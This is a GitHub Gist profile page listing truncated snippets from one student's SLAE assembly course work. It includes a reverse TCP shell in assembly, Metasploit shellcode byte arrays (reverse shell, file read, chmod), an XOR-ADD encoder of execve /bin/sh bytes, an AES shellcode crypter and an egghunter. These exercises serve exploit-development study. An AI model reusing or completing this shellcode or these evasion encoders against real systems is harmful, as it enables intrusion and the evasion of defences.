Skip to content

Instantly share code, notes, and snippets.

View spiritedwolf's full-sized avatar
Trying Harder!!

Spirited Wolf spiritedwolf

Trying Harder!!
View GitHub Profile
#!/usr/bin/python3
# Author: Shubham Singh
# Student ID: SLAE - 1342
from Crypto.Cipher import AES
from Crypto import Random
import base64,sys,binascii,os,getopt
# Argument List
argumentList = sys.argv[1:]
# Options
;SLAE-1342
;Original shellcode:- http://shell-storm.org/shellcode/files/shellcode-758.php
global _start
section .text
_start:
xor ecx,ecx ;Anything xor with itself would result zero
mul ecx ;The classic use of mul instruction. Now the eax:edx will become 0
push edx ;push nulls on stack
;SLAE-1342
;Original shellcode:- http://shell-storm.org/shellcode/files/shellcode-542.php
global _start
section .text
_start:
jmp short ok ;jump to ok
okk:
/*
# Title: linux/x86/shell_reverse_tcp (Metasploit)
# Tested on: x86 GNU/Linux
#Student ID: SLAE - 1342
*/
#include<stdio.h>
#include<string.h>
unsigned char buf[] =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
/*
# Title: linux/x86/read_file Shellcode (Metasploit)
# Tested on: x86 GNU/Linux
#Student ID: SLAE - 1342
*/
#include<stdio.h>
#include<string.h>
unsigned char buf[] =
"\xeb\x36\xb8\x05\x00\x00\x00\x5b\x31\xc9\xcd\x80\x89\xc3\xb8"
/*
# Title: linux/x86/chmod Shellcode (Metasploit)
# Tested on: x86 GNU/Linux
#Student ID: SLAE - 1342
*/
#include<stdio.h>
#include<string.h>
unsigned char buf[] =
#Simple XOR-ADD encoder
#SLAE - 1342
import sys
import binascii
a = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
b = bytes(a)
e = ""
e1 = ""
for x in bytearray(b):
; Author: Shubham Singh
; SLAE - 1342
; Assignment 2: Custom Encoding Scheme Decoder Shellcode / Linux x86
global _start
section .text
_start:
;Classic usage of JMP-CALL-POP Technique
jmp short call_shellcode ;Take a short jump to call_shellcode
/*
# Title: Linux/x86 - EggHunter + Null-Free Shellcode (33 Bytes)
# Author: Shubham Singh
# Tested on: x86 GNU/Linux
# Shellcode Length: 33 Bytes
#Student ID: SLAE - 1342
#Description: Null-Free Egg Hunter Shellcode - 33 Bytes
#file format elf32-i386
; Author: Shubham Singh
; SLAE - 1342
; Assignment 2: Shell Reverse TCP Shellcode / Linux x86 (83 Bytes)
global _start
section .text
_start:
;socket(AF_INET, SOCK_STREAM, 0)
;socket(2,1,0)